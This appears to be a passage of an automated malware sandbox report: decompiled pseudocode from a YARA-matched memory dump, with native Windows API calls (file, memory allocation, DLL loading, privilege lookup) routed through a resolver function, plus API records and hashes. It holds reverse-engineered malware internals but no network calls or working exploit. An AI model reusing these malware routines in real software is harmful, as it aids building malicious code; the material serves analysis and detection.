                                                              				_t6 =  &_a40; // 0x413a41
                                                              				_t20 =  *((intOrPtr*)( *_t32))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t6, _t31, _t34); // executed
                                                              				return _t20;
                                                              			}







                                                              0x0041869a
                                                              0x0041869b
                                                              0x004186a3
                                                              0x004186af
                                                              0x004186b7
                                                              0x004186bc
                                                              0x004186e5
                                                              0x004186e9

                                                              APIs
                                                              • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: A:A
                                                              • API String ID: 2738559852-2859176346
                                                              • Opcode ID: 2cdd7e05e09b2123967d775f78f849566628f1b014604cccfee217afc4bc1258
                                                              • Instruction ID: f4a3684558b612a2fa94b2540d8c7a2a3344d893819f1576fe7ed639326c6e0c
                                                              • Opcode Fuzzy Hash: 2cdd7e05e09b2123967d775f78f849566628f1b014604cccfee217afc4bc1258
                                                              • Instruction Fuzzy Hash: B7F0E7B2200209ABDB08DF89DC84DEB77A9EF8C354F058248BE0D97241C630E855CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 37%
                                                              			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                                              				void* _t18;
                                                              				void* _t27;
                                                              				intOrPtr* _t28;
                                                              
                                                              				_t13 = _a4;
                                                              				_t28 = _a4 + 0xc48;
                                                              				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                              				_t4 =  &_a40; // 0x413a41
                                                              				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
                                                              				return _t18;
                                                              			}






                                                              0x004186a3
                                                              0x004186af
                                                              0x004186b7
                                                              0x004186bc
                                                              0x004186e5
                                                              0x004186e9

                                                              APIs
                                                              • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: A:A
                                                              • API String ID: 2738559852-2859176346
                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 70%
                                                              			E004185EB(void* __ebx, void* __edi, intOrPtr* __esi, long _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                              				void* _v1;
                                                              				void* __ebp;
                                                              
                                                              				if(__ebx - 1 < 0) {
                                                              					asm("adc al, 0x83");
                                                              					asm("les edx, [edx+edx*2]");
                                                              					_push(_a16);
                                                              					_push(_a12);
                                                              					return  *((intOrPtr*)( *__esi))();
                                                              				} else {
                                                              					 *((intOrPtr*)(__esi + 0x55)) = __edi;
                                                              					__ebp = __esp;
                                                              					__eax = _a4;
                                                              					_t6 = __eax + 0xc40; // 0xc40
                                                              					__esi = _t6;
                                                              					_a44 = _a32;
                                                              					_a20 = _a8;
                                                              					__eax = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                              					__esi = __esi;
                                                              					__ebp = __ebp;
                                                              					return __eax;
                                                              				}
                                                              			}





                                                              0x004185ec
                                                              0x004185d4
                                                              0x004185d6
                                                              0x004185e3
                                                              0x004185e4
                                                              0x004185e9
                                                              0x004185ee
                                                              0x004185ee
                                                              0x004185f1
                                                              0x004185f3
                                                              0x004185ff
                                                              0x004185ff
                                                              0x0041861d
                                                              0x00418635
                                                              0x0041863d
                                                              0x0041863f
                                                              0x00418640
                                                              0x00418641
                                                              0x00418641

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: c39e46834f76aa3f8c048fc7669ab106f9fe51e0a5375508359928d33a2f3763
                                                              • Instruction ID: 8e173600259d527cff40da85d09929c670c52de49166a402e7e3643a904372b4
                                                              • Opcode Fuzzy Hash: c39e46834f76aa3f8c048fc7669ab106f9fe51e0a5375508359928d33a2f3763
                                                              • Instruction Fuzzy Hash: 1011F0B2204208ABCB48DF88DC84EEB73EDFF8C354B148609FA1C97241C630E8518BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
                                                              				char* _v8;
                                                              				struct _EXCEPTION_RECORD _v12;
                                                              				struct _OBJDIR_INFORMATION _v16;
                                                              				char _v536;
                                                              				void* _t15;
                                                              				struct _OBJDIR_INFORMATION _t17;
                                                              				struct _OBJDIR_INFORMATION _t18;
                                                              				void* _t30;
                                                              				void* _t31;
                                                              				void* _t32;
                                                              
                                                              				_v8 =  &_v536;
                                                              				_t15 = E0041AF80( &_v12, 0x104, _a8);
                                                              				_t31 = _t30 + 0xc;
                                                              				if(_t15 != 0) {
                                                              					_t17 = E0041B3A0(__eflags, _v8);
                                                              					_t32 = _t31 + 4;
                                                              					__eflags = _t17;
                                                              					if(_t17 != 0) {
                                                              						E0041B620( &_v12, 0);
                                                              						_t32 = _t32 + 8;
                                                              					}
                                                              					_t18 = E00419730(_v8);
                                                              					_v16 = _t18;
                                                              					__eflags = _t18;
                                                              					if(_t18 == 0) {
                                                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                              						return _v16;
                                                              					}
                                                              					return _t18;
                                                              				} else {
                                                              					return _t15;
                                                              				}
                                                              			}













                                                              0x00409b6c
                                                              0x00409b6f
                                                              0x00409b74
                                                              0x00409b79
                                                              0x00409b83
                                                              0x00409b88
                                                              0x00409b8b
                                                              0x00409b8d
                                                              0x00409b95
                                                              0x00409b9a
                                                              0x00409b9a
                                                              0x00409ba1
                                                              0x00409ba9
                                                              0x00409bac
                                                              0x00409bae
                                                              0x00409bc2
                                                              0x00000000
                                                              0x00409bc4
                                                              0x00409bca
                                                              0x00409b7e
                                                              0x00409b7e
                                                              0x00409b7e

                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                              • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                              • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                              				long _t21;
                                                              				void* _t31;
                                                              
                                                              				_t3 = _a4 + 0xc40; // 0xc40
                                                              				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                              				return _t21;
                                                              			}





                                                              0x004185ff
                                                              0x00418607
                                                              0x0041863d
                                                              0x00418641

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 79%
                                                              			E004187CA(void* __eax, void* __edx, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
                                                              				intOrPtr _v0;
                                                              				long _t16;
                                                              				void* _t25;
                                                              
                                                              				_push(_t29);
                                                              				_t12 = _v0;
                                                              				_t3 = _t12 + 0xc60; // 0xca0
                                                              				E004191F0(_t25, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
                                                              				_t16 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                              				return _t16;
                                                              			}






                                                              0x004187d0
                                                              0x004187d3
                                                              0x004187df
                                                              0x004187e7
                                                              0x00418809
                                                              0x0041880d

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 6c1580441a09a8ec2170b6877a31bfe4f0b32f28bd16d2c0d29d2d2b2dd48e52
                                                              • Instruction ID: c804dde35cf1ac0473364a4c902ef567f94a3ed367e25043d9951f7634916c80
                                                              • Opcode Fuzzy Hash: 6c1580441a09a8ec2170b6877a31bfe4f0b32f28bd16d2c0d29d2d2b2dd48e52
                                                              • Instruction Fuzzy Hash: 00F0F2B2210208ABDB14DF89DC95EEB77ADEF88754F158149FE1997241C634F910CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                              				long _t14;
                                                              				void* _t21;
                                                              
                                                              				_t3 = _a4 + 0xc60; // 0xca0
                                                              				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                              				return _t14;
                                                              			}





                                                              0x004187df
                                                              0x004187e7
                                                              0x00418809
                                                              0x0041880d

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 72%
                                                              			E0041871C(void* __esi, intOrPtr _a4, void* _a8) {
                                                              				long _t8;
                                                              				void* _t11;
                                                              				void* _t13;
                                                              
                                                              				_t13 = __esi + 1;
                                                              				asm("sbb byte [edi+0x11], 0x55");
                                                              				_t5 = _a4;
                                                              				_t2 = _t5 + 0x10; // 0x300
                                                              				_push(_t13);
                                                              				_t3 = _t5 + 0xc50; // 0x409773
                                                              				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                              				_t8 = NtClose(_a8); // executed
                                                              				return _t8;
                                                              			}






                                                              0x0041871c
                                                              0x0041871d
                                                              0x00418723
                                                              0x00418726
                                                              0x00418729
                                                              0x0041872f
                                                              0x00418737
                                                              0x00418745
                                                              0x00418749

                                                              APIs
                                                              • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 53a93013a3d916590a7dbbd104cfeeed5cf16c8d55a90a868afdcb9a701f3255
                                                              • Instruction ID: a3a960674d47dfb334ce48929eb3dddf51f861c4edd5726ae695893843251cd9
                                                              • Opcode Fuzzy Hash: 53a93013a3d916590a7dbbd104cfeeed5cf16c8d55a90a868afdcb9a701f3255
                                                              • Instruction Fuzzy Hash: 87E08C752002147BE710EFA8CC89F977B69EF44720F044199BA985B282C630EA4487D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00418720(intOrPtr _a4, void* _a8) {
                                                              				long _t8;
                                                              				void* _t11;
                                                              
                                                              				_t5 = _a4;
                                                              				_t2 = _t5 + 0x10; // 0x300
                                                              				_t3 = _t5 + 0xc50; // 0x409773
                                                              				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                              				_t8 = NtClose(_a8); // executed
                                                              				return _t8;
                                                              			}





                                                              0x00418723
                                                              0x00418726
                                                              0x0041872f
                                                              0x00418737
                                                              0x00418745
                                                              0x00418749

                                                              APIs
                                                              • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E004088E0(intOrPtr* _a4) {
                                                              				intOrPtr _v8;
                                                              				char _v24;
                                                              				char _v284;
                                                              				char _v804;
                                                              				char _v840;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* _t24;
                                                              				void* _t31;
                                                              				void* _t33;
                                                              				void* _t34;
                                                              				void* _t39;
                                                              				void* _t50;
                                                              				intOrPtr* _t52;
                                                              				void* _t53;
                                                              				void* _t54;
                                                              				void* _t55;
                                                              				void* _t56;
                                                              
                                                              				_t52 = _a4;
                                                              				_t39 = 0; // executed
                                                              				_t24 = E00406E30(_t52,  &_v24); // executed
                                                              				_t54 = _t53 + 8;
                                                              				if(_t24 != 0) {
                                                              					E00407040( &_v24,  &_v840);
                                                              					_t55 = _t54 + 8;
                                                              					do {
                                                              						E0041A100( &_v284, 0x104);
                                                              						E0041A770( &_v284,  &_v804);
                                                              						_t56 = _t55 + 0x10;
                                                              						_t50 = 0x4f;
                                                              						while(1) {
                                                              							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
                                                              							_t56 = _t56 + 0x10;
                                                              							if(_t31 != 0) {
                                                              								break;
                                                              							}
                                                              							_t50 = _t50 + 1;
                                                              							if(_t50 <= 0x62) {
                                                              								continue;
                                                              							} else {
                                                              							}
                                                              							goto L8;
                                                              						}
                                                              						_t9 = _t52 + 0x14; // 0xffffe1a5
                                                              						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                              						_t39 = 1;
                                                              						L8:
                                                              						_t33 = E00407070(_t39, _t50,  &_v24,  &_v840);
                                                              						_t55 = _t56 + 8;
                                                              					} while (_t33 != 0 && _t39 == 0);
                                                              					_t34 = E004070F0(_t52,  &_v24); // executed
                                                              					if(_t39 == 0) {
                                                              						asm("rdtsc");
                                                              						asm("rdtsc");
                                                              						_v8 = _t34 - 0 + _t34;
                                                              						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                              					}
                                                              					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                              					_t20 = _t52 + 0x31; // 0x5608758b
                                                              					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                              					return 1;
                                                              				} else {
                                                              					return _t24;
                                                              				}
                                                              			}





















                                                              0x004088eb
                                                              0x004088f3
                                                              0x004088f5
                                                              0x004088fa
                                                              0x004088ff
                                                              0x00408912
                                                              0x00408917
                                                              0x00408920
                                                              0x0040892c
                                                              0x0040893f
                                                              0x00408944
                                                              0x00408947
                                                              0x00408950
                                                              0x00408962
                                                              0x00408967
                                                              0x0040896c
                                                              0x00000000
                                                              0x00000000
                                                              0x0040896e
                                                              0x00408972
                                                              0x00000000
                                                              0x00000000
                                                              0x00408974
                                                              0x00000000
                                                              0x00408972
                                                              0x00408976
                                                              0x00408979
                                                              0x0040897f
                                                              0x00408981
                                                              0x0040898c
                                                              0x00408991
                                                              0x00408994
                                                              0x004089a1
                                                              0x004089ac
                                                              0x004089ae
                                                              0x004089b4
                                                              0x004089b8
                                                              0x004089bb
                                                              0x004089bb
                                                              0x004089c2
                                                              0x004089c5
                                                              0x004089ca
                                                              0x004089d7
                                                              0x00408906
                                                              0x00408906
                                                              0x00408906

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                              • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                                              • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                              • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID: @P
                                                              • API String ID: 3899507212-4139428406
                                                              • Opcode ID: b045b745e1c36e70cd7be4a877b28efd93bb8d7748d703591821b259e315971e
                                                              • Instruction ID: a58c99f82164f16de02dd07280c4aedbd4433a22374b3a416c0b1aaaa57c2f01
                                                              • Opcode Fuzzy Hash: b045b745e1c36e70cd7be4a877b28efd93bb8d7748d703591821b259e315971e
                                                              • Instruction Fuzzy Hash: 6C0146B5200208AFCB14DF89DC81EEB77A9EF88354F15815AFE1C97241CA30E951CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                              				void* _t10;
                                                              				void* _t15;
                                                              
                                                              				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                              				_t6 =  &_a8; // 0x413546
                                                              				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}





                                                              0x004188d7
                                                              0x004188e2
                                                              0x004188ed
                                                              0x004188f1

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: F5A
                                                              • API String ID: 1279760036-683449296
                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: a68128f02263c858938b4534922ae9bd2e82e0c6b7bea317de414c30e0931d15
                                                              • Instruction ID: d06cd51920d89e9503d57b19918dcb958bacd9f59fe63c147568b53da6ed8c8c
                                                              • Opcode Fuzzy Hash: a68128f02263c858938b4534922ae9bd2e82e0c6b7bea317de414c30e0931d15
                                                              • Instruction Fuzzy Hash: E701FE32E4022476E711A9956C03FFF7768AB40B25F04456EFE08BA1C2D7A9691642EA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                              • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                                              • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                              • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 43%
                                                              			E004188F2() {
                                                              				char _t12;
                                                              				void* _t17;
                                                              				void* _t21;
                                                              				void* _t22;
                                                              
                                                              				_t22 = _t21 + 1;
                                                              				asm("jecxz 0x1a");
                                                              				asm("aaa");
                                                              				asm("aam 0x82");
                                                              				asm("out 0x78, eax");
                                                              				_push(_t22);
                                                              				_t9 =  *0xFFFFFFFFEA0253C1;
                                                              				_t3 = _t9 + 0xc74; // 0xc74
                                                              				E004191F0(_t17,  *0xFFFFFFFFEA0253C1, _t3,  *((intOrPtr*)( *0xFFFFFFFFEA0253C1 + 0x10)), 0, 0x35);
                                                              				_t12 = RtlFreeHeap( *0xFFFFFFFFEA0253C5,  *0xFFFFFFFFEA0253C9,  *0xFFFFFFFFEA0253CD); // executed
                                                              				return _t12;
                                                              			}







                                                              0x004188f2
                                                              0x004188f3
                                                              0x004188f5
                                                              0x004188f6
                                                              0x004188f9
                                                              0x00418900
                                                              0x00418903
                                                              0x0041890f
                                                              0x00418917
                                                              0x0041892d
                                                              0x00418931

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: fd6080059986be986c9ae8ef21e12bcc721e5d69e0a88b5c8bbb0af6076930ee
                                                              • Instruction ID: c4ddabe3531c6e5d9c700b550ee0796d03988b238038cc2f984534a44c87bf33
                                                              • Opcode Fuzzy Hash: fd6080059986be986c9ae8ef21e12bcc721e5d69e0a88b5c8bbb0af6076930ee
                                                              • Instruction Fuzzy Hash: ACE026BA1043885BD700EEA498808D77794AF84208721425EEC4843203D125D9198AA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                              				char _t10;
                                                              				void* _t15;
                                                              
                                                              				_t3 = _a4 + 0xc74; // 0xc74
                                                              				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}





                                                              0x0041890f
                                                              0x00418917
                                                              0x0041892d
                                                              0x00418931

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                              				int _t10;
                                                              				void* _t15;
                                                              
                                                              				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}





                                                              0x00418a7a
                                                              0x00418a90
                                                              0x00418a94

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
